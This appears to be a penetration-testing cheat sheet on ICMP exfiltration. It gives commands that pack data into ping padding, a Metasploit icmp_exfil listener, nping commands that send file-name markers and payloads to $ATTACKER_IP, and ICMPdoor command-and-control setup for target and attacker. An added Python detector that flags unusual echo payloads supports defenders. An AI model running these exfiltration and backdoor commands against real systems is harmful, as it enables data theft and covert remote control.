# ICMP Exfiltration

* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm)

* Type 0 (Echo Reply) carries an optional, variable-length data field after the fixed header fields:

```
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                             Data                              +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```

## Usage
* The `-p` (pattern) option pads the data field with caller-supplied bytes. From the `ping` manual:

```
-p pattern
    You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
    data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
```

* Pass hex-encoded bytes as the pattern (at most 16 bytes, i.e. 32 hex digits):

```sh
ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p)
```

### Metasploit ICMP Exfiltration
* Listen for incoming ICMP data on the attacker host:

```sh
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set interface <interface>
run
```

* Exfiltrate from the target with `ping` as shown above, or with `nping`.

* Start the transmission with `nping`: a BOF marker carrying the file name, then the payload itself, then an EOF marker:

```sh
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"
```

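Detection-side counterpart to the header diagram, the `ping -p` padding and the `nping --data-string` framing above. This is an added Python example, not code from the page or from any tool it names: it parses the ICMP header fields, verifies the RFC 1071 checksum, and classifies the Data field so that echo payloads which are neither a known default ping fill nor a single repeated pad byte stand out for triage. The 32-byte Windows fill constant, the tolerance for an 8-byte timestamp prefix, and the sample packets are my own assumptions and constructions, not values from the page.

```python
import struct

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8

# Assumed reference fill (not from the page): the 32-byte payload Windows ping sends.
_WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(msg: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (zero-padded if odd length)."""
    if len(msg) % 2:
        msg += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(msg) // 2), msg))
    while total >> 16:                        # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_icmp(pkt: bytes) -> dict:
    """Split an ICMP message into the fields of the header diagram plus Data."""
    if len(pkt) < 8:
        raise ValueError("ICMP header is 8 bytes")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return {
        "type": icmp_type, "code": code, "checksum": csum,
        "id": ident, "seq": seq, "data": pkt[8:],
        # a message whose checksum is correct sums to 0xFFFF, so the complement is 0
        "checksum_ok": icmp_checksum(pkt) == 0,
    }


def build_echo(icmp_type: int, ident: int, seq: int, data: bytes) -> bytes:
    """Assemble an echo message in memory (used only to construct offline samples)."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    return struct.pack("!BBHHH", icmp_type, 0, icmp_checksum(hdr + data), ident, seq) + data


def _is_linux_default_fill(data: bytes) -> bool:
    # iputils ping: 8-byte timestamp, then every byte equals its offset within the
    # ICMP message (0x10, 0x11, ... after 8 header bytes + 8 timestamp bytes)
    return len(data) > 8 and all(data[i] == (i + 8) & 0xFF for i in range(8, len(data)))


def _repeat_unit(data: bytes, max_unit: int = 16):
    """Shortest prefix of at most max_unit bytes that tiles data, else None."""
    n = len(data)
    for plen in range(1, min(max_unit, n - 1) + 1):
        if all(data[i] == data[i % plen] for i in range(n)):
            return data[:plen]
    return None


def classify_payload(data: bytes) -> str:
    n = len(data)
    if n == 0:
        return "empty"
    if _is_linux_default_fill(data) or data == _WINDOWS_FILL:
        return "default-fill"
    # A `ping -p` pattern (<= 16 bytes) tiles the data field; also search past the
    # first 8 bytes, assuming the sender may have overwritten them with a timestamp.
    unit = _repeat_unit(data) or (n > 8 and _repeat_unit(data[8:])) or data
    if len(unit) == 1:
        return "pad-byte"                     # e.g. `ping -p ff`
    printable = sum(1 for b in unit if 32 <= b < 127 or b in (9, 10, 13))
    return "ascii-text" if printable / len(unit) >= 0.9 else "opaque"


def flag_suspicious(packets):
    """Return (id, seq, class, data_len) for echo messages whose Data field is
    neither a known default fill nor a single repeated pad byte."""
    findings = []
    for raw in packets:
        p = parse_icmp(raw)
        if p["type"] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
            continue
        kind = classify_payload(p["data"])
        if kind in ("ascii-text", "opaque"):
            findings.append((p["id"], p["seq"], kind, len(p["data"])))
    return findings


def sample_packets():
    """Constructed echo requests mirroring the page's cases (not real captures)."""
    ts = struct.pack("!II", 1700000000, 123456)            # fake timeval
    linux_default = ts + bytes((i + 8) & 0xFF for i in range(8, 56))
    padded_ff = b"\xff" * 56                               # ping -p ff
    text_pad = (b"data payload\n" * 5)[:56]                # ping -p $(echo ... | xxd -p)
    marker = b"EOF"                                        # nping --data-string "EOF"
    opaque = bytes(range(200, 232))                        # non-text, non-repeating bytes
    cases = [linux_default, padded_ff, text_pad, marker, _WINDOWS_FILL, opaque]
    return [build_echo(ICMP_ECHO_REQUEST, 0x1234, i + 1, d) for i, d in enumerate(cases)]


if __name__ == "__main__":
    for hit in flag_suspicious(sample_packets()):
        print("id=%#x seq=%d %s (%d bytes)" % hit)
```

Only the text-padded `ping`, the `nping` marker and the opaque sample are reported; the stock Linux and Windows fills and the single-byte `-p ff` pad are not. The classification is a heuristic: extend the default-fill checks for other ping implementations seen on your network before using it as an alert rule.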
### C2 over ICMP

* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor)

* On the target:

```sh
sudo icmpdoor -i <interface> -d $ATTACKER_IP
```

* On the attacker:

```sh
sudo icmp-cnc -i <interface> -d $TARGET_IP
```